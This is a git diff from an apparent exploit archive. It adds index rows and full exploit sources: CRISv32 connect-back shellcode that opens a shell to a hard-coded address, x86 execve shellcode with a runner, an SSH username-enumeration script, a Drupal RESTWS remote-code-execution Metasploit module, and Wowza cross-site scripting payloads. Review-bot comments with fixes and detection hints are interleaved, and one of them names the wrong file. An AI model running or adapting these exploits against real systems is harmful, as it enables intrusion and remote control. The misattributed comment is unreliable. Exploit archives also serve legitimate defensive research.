@@ -13183,7 +13183,7 @@ id,file,description,date,author,platform,type,port 15146,platforms/php/webapps/15146.txt,"Achievo 1.4.3 - CSRF",2010-09-28,"Pablo Milano",php,webapps,0 15147,platforms/php/webapps/15147.txt,"Micro CMS 1.0 b1 - Persistent XSS",2010-09-28,"SecPod Research",php,webapps,0 15148,platforms/windows/dos/15148.txt,"Microsoft Excel - SxView Record Parsing Heap Memory Corruption",2010-09-29,Abysssec,windows,dos,0 -15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 (Redhat/Ubuntu 10.04) - pktcdvd Kernel Memory Disclosure Proof of Concept",2010-09-29,"Jon Oberheide",linux,local,0 +15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 (Redhat / Ubuntu 10.04) - pktcdvd Kernel Memory Disclosure Proof of Concept",2010-09-29,"Jon Oberheide",linux,local,0 15151,platforms/php/webapps/15151.txt,"Webspell 4.2.1 asearch.php SQL Injection",2010-09-29,"silent vapor",php,webapps,0 15152,platforms/php/webapps/15152.py,"Webspell wCMS-Clanscript4.01.02net<= static&static Blind SQL Injection",2010-09-29,"Easy Laster",php,webapps,0 15153,platforms/php/webapps/15153.txt,"Webspell 4.x - safe_query Bypass",2010-09-29,"silent vapor",php,webapps,0 
@@ -18028,7 +18028,7 @@ id,file,description,date,author,platform,type,port 20717,platforms/windows/remote/20717.txt,"elron im anti-virus 3.0.3 - Directory Traversal",2001-03-23,"Erik Tayler",windows,remote,0 20718,platforms/unix/local/20718.txt,"MySQL 3.20.32 a/3.23.34 Root Operation Symbolic Link File Overwriting",2001-03-18,lesha,unix,local,0 20719,platforms/multiple/remote/20719.txt,"Tomcat 3.2.1/4.0_Weblogic Server 5.1 URL JSP Request Source Code Disclosure",2001-03-28,"Sverre H. Huseby",multiple,remote,0 -20720,platforms/linux/local/20720.c,"Linux Kernel <= 2.2.18 (RH 7.0/6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (1)",2001-03-27,"Wojciech Purczynski",linux,local,0 +20720,platforms/linux/local/20720.c,"Linux Kernel <= 2.2.18 (RH 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (1)",2001-03-27,"Wojciech Purczynski",linux,local,0 20721,platforms/linux/local/20721.c,"Linux Kernel <= 2.2.18 (RH 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (2)",2001-03-27,"Wojciech Purczynski",linux,local,0 20722,platforms/multiple/remote/20722.txt,"Caucho Technology Resin 1.2/1.3 JavaBean Disclosure",2001-04-03,lovehacker,multiple,remote,0 20723,platforms/windows/remote/20723.pl,"Gene6 BPFTP FTP Server 2.0 User Credentials Disclosure",2001-04-03,"Rob Beck",windows,remote,0 
@@ -36284,3 +36284,13 @@ id,file,description,date,author,platform,type,port 40125,platforms/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server Side Include (SSI) Daemon Remote Format String Exploit",2016-07-19,bashis,multiple,remote,0 40126,platforms/php/webapps/40126.txt,"NewsP Free News Script 1.4.7 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80 40127,platforms/php/webapps/40127.txt,"newsp.eu PHP Calendar Script 1.0 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80 +40128,platforms/lin_x86/shellcode/40128.c,"Linux/CRISv32 - Axis Communication Connect Back Shellcode (189 bytes)",2016-07-20,bashis,lin_x86,shellcode,0 +40129,platforms/python/webapps/40129.txt,"Django CMS 3.3.0 - (Editor Snippet) Persistent XSS",2016-07-20,Vulnerability-Lab,python,webapps,80 +40130,platforms/php/remote/40130.rb,"Drupal RESTWS Module 7.x - Remote PHP Code Execution (Metasploit)",2016-07-20,"Mehmet Ince",php,remote,80 +40131,platforms/lin_x86/shellcode/40131.c,"Linux/x86 - execve /bin/sh Shellcode (19 bytes)",2016-07-20,sajith,lin_x86,shellcode,0 +40132,platforms/windows/local/40132.txt,"Wowza Streaming Engine 4.5.0 - Local Privilege Escalation",2016-07-20,LiquidWorm,windows,local,0 +40133,platforms/multiple/webapps/40133.html,"Wowza Streaming Engine 4.5.0 - Remote Privilege Escalation",2016-07-20,LiquidWorm,multiple,webapps,8088 +40134,platforms/multiple/webapps/40134.html,"Wowza Streaming Engine 4.5.0 - Add Advanced Admin CSRF",2016-07-20,LiquidWorm,multiple,webapps,8088 +40135,platforms/multiple/webapps/40135.txt,"Wowza Streaming Engine 4.5.0 - Multiple XSS",2016-07-20,LiquidWorm,multiple,webapps,8088 +40136,platforms/linux/remote/40136.py,"OpenSSHD <= 7.2p2 - Username Enumeration",2016-07-20,0_o,linux,remote,22 +40137,platforms/php/webapps/40137.html,"WordPress Video Player Plugin 1.5.16 - SQL Injection",2016-07-20,"David Vaartjes",php,webapps,80 
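Review bot: row 40128 is filed under platforms/lin_x86/shellcode with platform "lin_x86", but its title is "Linux/CRISv32 - Axis Communication Connect Back Shellcode"; CRISv32 is not an x86 target, so the directory and platform column contradict the title and anyone filtering by platform will not find it. Two smaller consistency points in the same hunk: the new 40136 row introduces "OpenSSHD <= 7.2p2" while this very commit strips "<=" from dozens of older titles (1705, 1749, 1760 and others), and 40128 says "Axis Communication" where the existing 40125 row says "Axis Communications".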
diff --git a/platforms/lin_x86/shellcode/40128.c b/platforms/lin_x86/shellcode/40128.c new file mode 100755 index 000000000..2896a36f9 --- /dev/null +++ b/platforms/lin_x86/shellcode/40128.c 
@@ -0,0 +1,115 @@ +/* + * Title: Axis Communication Linux/CRISv32 - Connect Back Shellcode + * Author: bashis / 2016 + * + */ + +#include + +char sc[] = + //close(0) + "\x7a\x86" // clear.d r10 + "\x5f\x9c\x06\x00" // movu.w 0x6,r9 + "\x3d\xe9" // break 13 + //close(1) + "\x41\xa2" // moveq 1,r10 + "\x5f\x9c\x06\x00" // movu.w 0x6,r9 + "\x3d\xe9" // break 13 + //close(2) + "\x42\xa2" // moveq 2,r10 + "\x5f\x9c\x06\x00" // movu.w 0x6,r9 + "\x3d\xe9" // break 13 + // + "\x10\xe1" // addoq 16,sp,acr + "\x42\x92" // moveq 2,r9 + "\xdf\x9b" // move.w r9,[acr] + "\x10\xe1" // addoq 16,sp,acr + "\x02\xf2" // addq 2,acr + //PORT 443 + "\x5f\x9e\x01\xbb" // move.w 0xbb01,r9 + "\xdf\x9b" // move.w r9,[acr] + "\x10\xe1" // addoq 16,sp,acr + "\x6f\x96" // move.d acr,r9 + "\x04\x92" // addq 4,r9 + //IP 192.168.57.1 + "\x6f\xfe\xc0\xa8\x39\x01" // move.d 139a8c0,acr + "\xe9\xfb" // move.d acr,[r9] + // + //socket() + "\x42\xa2" // moveq 2,r10 + "\x41\xb2" // moveq 1,r11 + "\x7c\x86" // clear.d r12 + "\x6e\x96" // move.d $sp,$r9 + "\xe9\xaf" // move.d $r10,[$r9+] + "\xe9\xbf" // move.d $r11,[$r9+] + "\xe9\xcf" // move.d $r12,[$r9+] + "\x41\xa2" // moveq 1,$r10 + "\x6e\xb6" // move.d $sp,$r11 + "\x5f\x9c\x66\x00" // movu.w 0x66,$r9 + "\x3d\xe9" // break 13 + // + "\x6a\x96" // move.d $r10,$r9 + "\x0c\xe1" // addoq 12,$sp,$acr + "\xef\x9b" // move.d $r9,[$acr] + "\x0c\xe1" // addoq 12,$sp,$acr + "\x6e\x96" // move.d $sp,$r9 + "\x10\x92" // addq 16,$r9 + "\x6f\xaa" // move.d [$acr],$r10 + "\x69\xb6" // move.d $r9,$r11 + "\x50\xc2" // moveq 16,$r12 + // + // connect() + "\x6e\x96" // move.d $sp,$r9 + "\xe9\xaf" // move.d $r10,[$r9+] + "\xe9\xbf" // move.d $r11,[$r9+] + "\xe9\xcf" // move.d $r12,[$r9+] + "\x43\xa2" // moveq 3,$r10 + "\x6e\xb6" // move.d $sp,$r11 + "\x5f\x9c\x66\x00" // movu.w 0x66,$r9 + "\x3d\xe9" // break 13 + // + //dup(1) + "\x6f\xaa" // move.d [$acr],$r10 + "\x41\xb2" // moveq 1,$r11 + "\x5f\x9c\x3f\x00" // movu.w 0x3f,$r9 + "\x3d\xe9" // break 13 + // + //dup(2) 
+ "\x6f\xaa" // move.d [$acr],$r10 + "\x42\xb2" // moveq 2,$r11 + "\x5f\x9c\x3f\x00" // movu.w 0x3f,$r9 + "\x3d\xe9" // break 13 + + //execve("/bin/sh",NULL,NULL) + "\x90\xe2" // subq 16,$sp + "\x6e\x96" // move.d $sp,$r9 + "\x6e\xa6" // move.d $sp,$10 + "\x6f\x0e\x2f\x2f\x62\x69" // move.d 69622f2f,$r0 + "\xe9\x0b" // move.d $r0,[$r9] + "\x04\x92" // addq 4,$r9 + "\x6f\x0e\x6e\x2f\x73\x68" // move.d 68732f6e,$r0 + "\xe9\x0b" // move.d $r0,[$r9] + "\x04\x92" // addq 4,$r9 + "\x79\x8a" // clear.d [$r9] + "\x04\x92" // addq 4,$r9 + "\x79\x8a" // clear.d [$r9] + "\x04\x92" // addq 4,$r9 + "\xe9\xab" // move.d $r10,[$r9] + "\x04\x92" // addq 4,$r9 + "\x79\x8a" // clear.d [$r9] + "\x10\xe2" // addq 16,$sp + "\x6e\xf6" // move.d $sp,$acr + "\x6e\x96" // move.d $sp,$r9 + "\x6e\xb6" // move.d $sp,$r11 + "\x7c\x86" // clear.d $r12 + "\x4b\x92" // moveq 11,$r9 + "\x3d\xe9"; // break 13 + +void +main(void) +{ + void (*s)(void); + printf("sc size %d\n", sizeof(sc)); + s = sc; + s(); +} \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/40131.c b/platforms/lin_x86/shellcode/40131.c new file mode 100755 index 000000000..0cf14cba5 --- /dev/null +++ b/platforms/lin_x86/shellcode/40131.c @@ -0,0 +1,37 @@ +/* +# Linux/x86 - execve /bin/sh shellcode (19 bytes) +# Author: sajith +# Tested on: i686 GNU/Linux +# Shellcode Length: 19 +# SLAE - 750 + +Disassembly of section .text: + +08048060 <_start>: +8048060: 31 c0 xor eax,eax +8048062: 50 push eax +8048063: 68 2f 2f 73 68 push 0x68732f2f +8048068: 68 2f 62 69 6e push 0x6e69622f +804806d: 87 e3 xchg ebx,esp +804806f: b0 0b mov al,0xb +8048071: cd 80 int 0x80 +===============poc by sajith shetty========================= +*/ + +#include +#include + +unsigned char code[] = \ + +"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xe3\xb0\x0b\xcd\x80"; + +main() +{ + +printf("Shellcode Length: %d\n", strlen(code)); + +int (*ret)() = (int(*)())code; + +ret(); + +} \ No newline at end of file 
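Review bot: the `#include` directive at the top of 40132.c names no header, so `printf` in `main` has no prototype and the file does not build as committed; `<stdio.h>` is the header it needs. Two smaller points in the same file: `void main(void)` is not a standard signature (it should be `int main(void)` returning a value), and the comment `move.d $sp,$10` in the execve block should read `$r10`, since the same opcode family (`\x6e\x96`, `\x6e\xb6`, `\x6e\xf6`) is annotated as `$r9`, `$r11` and `$acr` elsewhere in the listing. The header comment should also state the fixed destination that the `//PORT 443` and `//IP 192.168.57.1` annotations encode, so a reader does not have to recover it from the byte comments. From a defender's side, the annotated sequence (close fds 0, 1 and 2, socket, connect, dup onto the socket, execve of `/bin/sh`) is the textbook connect-back pattern on this architecture; an outbound connection to port 443 from an embedded Linux host immediately followed by a shell is the behaviour to alert on.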
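Review bot: both `#include` lines in 40131.c are missing their header names, and `main()` is declared without a return type, so the file will not compile cleanly as committed; `printf` needs `<stdio.h>`, `strlen` needs `<string.h>`, and `main` should be `int main(void)`. Separately, `strlen(code)` returns a `size_t` but is printed with `%d`; `%zu` is the matching conversion. The `strlen` count is only meaningful because none of the 19 bytes in `code[]` is `0x00`, which holds for this string and agrees with the `Shellcode Length: 19` stated in the header comment and with the disassembly (`31 c0` through `cd 80`).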
diff --git a/platforms/linux/remote/40136.py b/platforms/linux/remote/40136.py new file mode 100755 index 000000000..04978e199 --- /dev/null +++ b/platforms/linux/remote/40136.py 
@@ -0,0 +1,157 @@ +#!/usr/bin/python +# +# CVEs: CVE-2016-6210 (Credits for this go to Eddie Harari) +# +# Author: 0_o -- null_null +# nu11.nu11 [at] yahoo.com +# Oh, and it is n-u-one-one.n-u-one-one, no l's... +# Wonder how the guys at packet storm could get this wrong :( +# +# Date: 2016-07-19 +# +# Purpose: User name enumeration against SSH daemons affected by CVE-2016-6210. +# +# Prerequisites: Network access to the SSH daemon. +# +# DISCLAIMER: Use against your own hosts only! Attacking stuff you are not +# permitted to may put you in big trouble! +# +# And now - the fun part :-) +# + + +import paramiko +import time +import numpy +import argparse +import sys + +args = None + +class bcolors: + HEADER = '\033[95m' + OKBLUE = '\033[94m' + OKGREEN = '\033[92m' + WARNING = '\033[93m' + FAIL = '\033[91m' + ENDC = '\033[0m' + BOLD = '\033[1m' + UNDERLINE = '\033[4m' + + +def get_args(): + parser = argparse.ArgumentParser() + group = parser.add_mutually_exclusive_group() + parser.add_argument("host", type = str, help = "Give SSH server address like ip:port or just by ip") + group.add_argument("-u", "--user", type = str, help = "Give a single user name") + group.add_argument("-U", "--userlist", type = str, help = "Give a file containing a list of users") + parser.add_argument("-e", "--enumerated", action = "store_true", help = "Only show enumerated users") + parser.add_argument("-s", "--silent", action = "store_true", help = "Like -e, but just the user names will be written to stdout (no banner, no anything)") + parser.add_argument("--bytes", default = 50000, type = int, help = "Send so many BYTES to the SSH daemon as a password") + parser.add_argument("--samples", default = 12, type = int, help = "Collect so many SAMPLES to calculate a timing baseline for authenticating non-existing users") + parser.add_argument("--factor", default = 3.0, type = float, help = "Used to compute the upper timing boundary for user enumeration") + parser.add_argument("--trials", default = 
1, type = int, help = "try to authenticate user X for TRIALS times and compare the mean of auth timings against the timing boundary") + args = parser.parse_args() + return args + + +def get_banner(host, port): + ssh = paramiko.SSHClient() + ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) + try: + ssh.connect(hostname = host, port = port, username = 'invalidinvalidinvalid', password = 'invalidinvalidinvalid') + except: + banner = ssh.get_transport().remote_version + ssh.close() + return banner + + +def connect(host, port, user): + global args + starttime = 0.0 + endtime = 0.0 + p = 'B' * int(args.bytes) + ssh = paramiko.SSHClient() + ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) + starttime=time.clock() + try: + ssh.connect(hostname = host, port = port, username = user, password = p, look_for_keys = False, gss_auth = False, gss_kex = False, gss_deleg_creds = False, gss_host = None, allow_agent = False) + except: + endtime=time.clock() + finally: + ssh.close() + return endtime - starttime + + + +def main(): + global args + args = get_args() + if not args.silent: print("\n\nUser name enumeration against SSH daemons affected by CVE-2016-6210") + if not args.silent: print("Created and coded by 0_o (nu11.nu11 [at] yahoo.com), PoC by Eddie Harari\n\n") + if args.host: + host = args.host.split(":")[0] + try: + port = int(args.host.split(":")[1]) + except IndexError: + port = 22 + users = [] + if args.user: + users.append(args.user) + elif args.userlist: + with open(args.userlist, "r") as f: + users = f.readlines() + else: + if not args.silent: print(bcolors.FAIL + "[!] " + bcolors.ENDC + "You must give a user or a list of users") + sys.exit() + if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Testing SSHD at: " + bcolors.BOLD + str(host) + ":" + str(port) + bcolors.ENDC + ", Banner: " + bcolors.BOLD + get_banner(host, port) + bcolors.ENDC) + # get baseline timing for non-existing users... 
+ baseline_samples = [] + baseline_mean = 0.0 + baseline_deviation = 0.0 + if not args.silent: sys.stdout.write(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Getting baseline timing for authenticating non-existing users") + for i in range(1, int(args.samples) + 1): + if not args.silent: sys.stdout.write('.') + if not args.silent: sys.stdout.flush() + sample = connect(host, port, 'foobar-bleh-nonsense' + str(i)) + baseline_samples.append(sample) + if not args.silent: sys.stdout.write('\n') + # remove the biggest and smallest value + baseline_samples.sort() + baseline_samples.pop() + baseline_samples.reverse() + baseline_samples.pop() + # do math + baseline_mean = numpy.mean(numpy.array(baseline_samples)) + baseline_deviation = numpy.std(numpy.array(baseline_samples)) + if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Baseline mean for host " + host + " is " + str(baseline_mean) + " seconds.") + if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Baseline variation for host " + host + " is " + str(baseline_deviation) + " seconds.") + upper = baseline_mean + float(args.factor) * baseline_deviation + if not args.silent: print(bcolors.WARNING + "[*] " + bcolors.ENDC + "Defining timing of x < " + str(upper) + " as non-existing user.") + if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Testing your users...") + # + # Get timing for the given user name... 
+ # + for u in users: + user = u.strip() + enum_samples = [] + enum_mean = 0.0 + for t in range(0, int(args.trials)): + timeval = connect(host, port, user) + enum_samples.append(timeval) + enum_mean = numpy.mean(numpy.array(enum_samples)) + if (enum_mean < upper): + if not (args.enumerated or args.silent) : + print(bcolors.FAIL + "[-] " + bcolors.ENDC + user + " - timing: " + str(enum_mean)) + else: + if not args.silent: + print(bcolors.OKGREEN + "[+] " + bcolors.ENDC + user + " - timing: " + str(enum_mean)) + else: + print(user) + + + + +if __name__ == "__main__": + main() + diff --git a/platforms/multiple/webapps/40133.html b/platforms/multiple/webapps/40133.html new file mode 100755 index 000000000..3396af11b --- /dev/null +++ b/platforms/multiple/webapps/40133.html @@ -0,0 +1,60 @@ + + + + +
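Review bot: `connect()` in 40136.py only assigns `endtime` inside the `except:` branch, so if `ssh.connect` ever returns without raising (the tested password happens to be accepted) the function returns `0.0 - starttime`, a large negative value that always falls below `upper` and is reported as a non-existing user; take the end timestamp in the `finally:` block before `ssh.close()`. In the same function `time.clock()` measures processor time on Unix (it is wall-clock only on Windows) and was removed in Python 3.8, so the round-trip duration the baseline/trial comparison relies on is not what it returns there; `time.monotonic()` is the wall-clock timer. The bare `except:` clauses in `connect()` and `get_banner()` also swallow `KeyboardInterrupt`, and `get_banner()` calls `ssh.get_transport().remote_version` even when the TCP connection failed and `get_transport()` is `None`, which surfaces as an `AttributeError` rather than a readable error. `--samples` must be at least 3, since two values are popped before `numpy.std` runs on the list. For detection: every probe reaches the daemon as a password authentication attempt carrying a `--bytes`-sized (default 50000) password, and the baseline probes use the user names `invalidinvalidinvalid` and `foobar-bleh-nonsense<n>`, which appear verbatim in the server's auth log.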
+ + + + + + + + + + +
+ + diff --git a/platforms/multiple/webapps/40134.html b/platforms/multiple/webapps/40134.html new file mode 100755 index 000000000..97d07e015 --- /dev/null +++ b/platforms/multiple/webapps/40134.html @@ -0,0 +1,52 @@ + + + + +
+ + + + + + + + + + +
+ + diff --git a/platforms/multiple/webapps/40135.txt b/platforms/multiple/webapps/40135.txt new file mode 100755 index 000000000..a626b422f --- /dev/null +++ b/platforms/multiple/webapps/40135.txt 
@@ -0,0 +1,117 @@ + +Wowza Streaming Engine 4.5.0 Multiple Cross-Site Scripting Vulnerabilities + + +Vendor: Wowza Media Systems, LLC. +Product web page: https://www.wowza.com +Affected version: 4.5.0 (build 18676) +Platform: JSP + +Summary: Wowza Streaming Engine is robust, customizable, and scalable +server software that powers reliable video and audio streaming to any +device. Learn the benefits of using Wowza Streaming Engine to deliver +high-quality live and on-demand video content to any device. + +Desc: Wowza Streaming Engine suffers from multiple reflected cross-site +scripting vulnerabilities when input passed via several parameters to +several scripts is not properly sanitized before being returned to the +user. This can be exploited to execute arbitrary HTML and script code +in a user's browser session in context of an affected site. + +Tested on: Winstone Servlet Engine v1.0.5 + Servlet/2.5 (Winstone/1.0.5) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5343 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5343.php + + +03.07.2016 + +-- + + +http://localhost:8088/enginemanager/applications/live/main/view.htm?vhost=_defaultVHost_&appName=live +http://localhost:8088/enginemanager/applications/monitoring/historical.jsdata?vhost=_defaultVHost_&appName=test&periodStart=2016-07-03T13%3A42%3A32%2B02%3A00&periodEnd=2016-07-03T14%3a42%3a32%2b02%3a00 +http://localhost:8088/enginemanager/applications/monitoring/historical.jsdata?vhost=_defaultVHost_&appName=test&periodStart=2016-07-03T13%3a42%3a32%2b02%3a00&periodEnd=2016-07-03T14%3A42%3A32%2B02%3A00 +http://localhost:8088/enginemanager/applications/liveedge/securityplayback/edit.htm?appName=test&vhost=_defaultVHost_ + +--- + +POST /enginemanager/applications/liveedge/main/edit.htm +Host: localhost:8088 + 
+vhost=_defaultVHost_";alert(5)//&uiAppName=test&uiAppType=Live%20Edge%20Application§ion=main&version=1467548313123&action=new&description=desctest&mpegDash=true&_mpegDash=on&appleHLS=true&_appleHLS=on&adobeRTMP=true&_adobeRTMP=on&adobeHDS=true&_adobeHDS=on&msSmooth=true + +--- + +POST /enginemanager/applications/liveedge/publishers/encoder/PANASONIC_CAMCORDER.htm +Host: localhost:8088 + +vhost=_defaultVHost_&uiAppName=test";alert(7)//&uiAppType=Live+Edge+Application&instanceName=";alert(8)//§ion=publishers_panasonic_camcorder";alert(9)//&version=0&driverName=Panasonic&publishersStreamFileName=panasonicstreamname&cameraIpAddress=1.1.1.1&appType=liveedge";alert(10)//&appName=test + +--- + +POST /enginemanager/applications/liveedge/securityplayback/edit.htm HTTP/1.1 +Host: localhost:8088 + +vhost=_defaultVHost_";alert(11)//&uiAppName=test&uiAppType=Live%20Edge%20Application§ion=securityplayback&version=1467549110876&_requireSecureRTMPConnection=on&secureTokenState=Protect+all+protocols+using+hash+(SecureToken+version+2)&sharedSecret=sharedtestsecret&hashAlgorithm=SHA + +--- + +POST /enginemanager/applications/liveedge/streamtarget/add.htm HTTP/1.1 +Host: localhost:8088 + +enabled=true&protocol=RTMP&destinationName=akamai&destApplicationRequired=false&destAppInstanceRequired=false&usernameRequired=true&passwordRequired=true&wowzaCloudDestinationType=1*/alert(13)//&facebookAccessToken=&facebookDestName=&facebookDestId=&facebookEventSourceName=&wowzaDotComFacebookUrl=https%3A%2F%2Ffb.wowza.com%2Fwsem%2Fstream_targets%2Fv1&connectionCode=&protocolShoutcast=Shoutcast + +--- + +------------------------------------------------------------------------------------------------------------------- +| Script | Parameter | +------------------------------------------------------------------------------------------------------------------- + | | +/enginemanager/applications/live/main/view.htm | appName | +/enginemanager/applications/liveedge/main/edit.htm | uiAppType | 
+/enginemanager/applications/liveedge/main/edit.htm | vhost | +/enginemanager/applications/liveedge/publishers/encoder/PANASONIC_CAMCORDER.htm | appType | +/enginemanager/applications/liveedge/publishers/encoder/PANASONIC_CAMCORDER.htm | instanceName | +/enginemanager/applications/liveedge/publishers/encoder/PANASONIC_CAMCORDER.htm | section | +/enginemanager/applications/liveedge/publishers/encoder/PANASONIC_CAMCORDER.htm | uiAppType | +/enginemanager/applications/liveedge/securityplayback/edit.htm | appName | +/enginemanager/applications/liveedge/securityplayback/edit.htm | uiAppType | +/enginemanager/applications/liveedge/securityplayback/edit.htm | vhost | +/enginemanager/applications/liveedge/streamtarget/add.htm | wowzaCloudDestinationType | +/enginemanager/applications/liveedge/streamtarget/wizard.htm | appName | +/enginemanager/applications/liveedge/streamtarget/wizard.htm | vhost | +/enginemanager/applications/monitoring/historical.jsdata | periodEnd | +/enginemanager/applications/monitoring/historical.jsdata | periodStart | +/enginemanager/applications/new.htm | uiAppName | +/enginemanager/server/mediacachesource/edit.htm | action | +/enginemanager/server/mediacachesource/edit.htm | maxTTLDays | +/enginemanager/server/mediacachesource/edit.htm | maxTTLHours | +/enginemanager/server/mediacachesource/edit.htm | maxTTLMinutes | +/enginemanager/server/mediacachesource/edit.htm | maxTTLSeconds | +/enginemanager/server/mediacachesource/edit.htm | minTTLDays | +/enginemanager/server/mediacachesource/edit.htm | minTTLHours | +/enginemanager/server/mediacachesource/edit.htm | minTTLMinutes | +/enginemanager/server/mediacachesource/edit.htm | minTTLSeconds | +/enginemanager/server/mediacachestore/edit.htm | action | +/enginemanager/server/transcoderencode/edit.htm | action | +/enginemanager/server/transcoderencode/edit.htm | appType | +/enginemanager/server/transcoderencode/edit.htm | templateName | +/enginemanager/server/vhost/streamfile/new.htm | streamName | 
+/enginemanager/transcoder/new.htm | appType | +/enginemanager/transcoder/new.htm | dstTemplate | +/enginemanager/applications/monitoring/app.jsdata | appName | +/enginemanager/applications/monitoring/historical.jsdata | appName | +/enginemanager/applications/monitoring/historical.jsdata | vhost | +/enginemanager/server/logs/getlog.jsdata | filter | +/enginemanager/server/logs/getlog.jsdata | logMode | +/enginemanager/server/logs/getlog.jsdata | logName | +/enginemanager/server/logs/getlog.jsdata | logType | + | | +---------------------------------------------------------------------------------|--------------------------------| diff --git a/platforms/php/remote/40130.rb b/platforms/php/remote/40130.rb new file mode 100755 index 000000000..65e3e7d01 --- /dev/null +++ b/platforms/php/remote/40130.rb 
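Review bot: in the POST bodies of 40135.txt the `§ion=` fragments are an HTML-entity mangling of `&section=` (the `section` parameter the table lists for `PANASONIC_CAMCORDER.htm`), so the first `main/edit.htm` body, the `PANASONIC_CAMCORDER.htm` body and the `securityplayback/edit.htm` body do not reproduce as pasted. The advisory also gives no vendor response, fix or fixed version, the `PANASONIC_CAMCORDER.htm` request line lacks the `HTTP/1.1` suffix the other request lines carry, and the closing rule of the table uses a different column layout from the header (`|` after the script column), which breaks the alignment. For remediation, every listed injection lands in a JavaScript string context (`";alert(n)//`) or, for `wowzaCloudDestinationType`, a JavaScript comment context (`*/alert(13)//`), so the fix needs JavaScript-context output encoding rather than HTML escaping alone; restricting the Engine Manager interface on `:8088` to trusted networks limits exposure until a fixed build is available.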
@@ -0,0 +1,86 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Drupal RESTWS Module 7.x Remote PHP Code Execution', + 'Description' => %q{ + This module exploits the Drupal RESTWS module vulnerability. + RESTWS alters the default page callbacks for entities to provide + additional functionality. A vulnerability in this approach allows + an unauthenticated attacker to send specially crafted requests resulting + in arbitrary PHP execution + + This module was tested against RESTWS 7.x with Drupal 7.5 +installation on Ubuntu server. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Devin Zuczek', # discovery + 'Mehmet Ince ' # msf module + ], + 'References' => + [ + ['URL', 'https://www.drupal.org/node/2765567'], + ['URL', +'https://www.mehmetince.net/exploit/drupal-restws-module-7x-remote-php-code-execution'] + ], + 'Privileged' => false, + 'Payload' => + { + 'DisableNops' => true + }, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => [ ['Automatic', {}] ], + 'DisclosureDate' => 'Jul 13 2016', + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('TARGETURI', [ true, "The target URI of the +Drupal installation", '/']) + ], self.class + ) + end + + def check + r = rand_text_alpha(8 + rand(4)) + url = normalize_uri(target_uri.path, "?q=taxonomy_vocabulary/", r +, "/passthru/echo%20#{r}") + res = send_request_cgi( + 'method' => 'GET', + 'uri' => url + ) + if res && res.body =~ /#{r}/ + return Exploit::CheckCode::Appears + end + return Exploit::CheckCode::Safe + end + + def exploit + random = rand_text_alpha(1 + rand(2)) + url = normalize_uri(target_uri.path, + "?q=taxonomy_vocabulary/", + random , + "/passthru/", + Rex::Text.uri_encode("php 
-r +'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'") + ) + send_request_cgi( + 'method' => 'GET', + 'uri' => url + ) + end +end diff --git a/platforms/php/webapps/40137.html b/platforms/php/webapps/40137.html new file mode 100755 index 000000000..0423f74b4 --- /dev/null +++ b/platforms/php/webapps/40137.html @@ -0,0 +1,116 @@ + + + + +
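Review bot: `check` in 40130.rb returns `Appears` whenever the random token `r` occurs anywhere in the response body, but `r` is also part of the requested path (`?q=taxonomy_vocabulary/<r>/passthru/echo%20<r>`), and Drupal's default "requested page could not be found" response echoes that path back, so an unaffected site can yield a false positive; verify that the token appears outside the reflected URL, or use a second token for the `echo` argument. `exploit` sends its request without inspecting the response or handling a `nil` return, so a failed delivery is silent. Passing `self.class` as the second argument to `register_options` is the older form that current framework modules omit. The description text is also broken mid-sentence (`Drupal 7.5` / `installation on Ubuntu server`) and lacks a full stop after `arbitrary PHP execution`. For detection, the visible request shape `?q=taxonomy_vocabulary/<alpha>/passthru/<command>` is a precise web-log signature for this module, and the RESTWS advisory cited in the references (https://www.drupal.org/node/2765567) is where the fixed release is announced.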
+ + + + + + + + + + + +
+ + diff --git a/platforms/python/webapps/40129.txt b/platforms/python/webapps/40129.txt new file mode 100755 index 000000000..eb5a271ee --- /dev/null +++ b/platforms/python/webapps/40129.txt 
@@ -0,0 +1,349 @@ +Document Title: +=============== +Django CMS v3.3.0 - (Editor Snippet) Persistent Web Vulnerability + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1869 + +Security Release: https://www.djangoproject.com/weblog/2016/jul/18/security-releases/ + +http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6186 + +CVE-ID: +======= +CVE-2016-6186 + + +Release Date: +============= +2016-07-19 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1869 + + +Common Vulnerability Scoring System: +==================================== +3.5 + + +Product & Service Introduction: +=============================== +django CMS is a modern web publishing platform built with Django, the web application framework for perfectionists with deadlines. +django CMS offers out-of-the-box support for the common features you’d expect from a CMS, but can also be easily customised and +extended by developers to create a site that is tailored to their precise needs. + +(Copy of the Homepage: http://docs.django-cms.org/en/release-3.3.x/upgrade/3.3.html ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered an application-side vulnerability (CVE-2016-6186) in the official Django v3.3.0 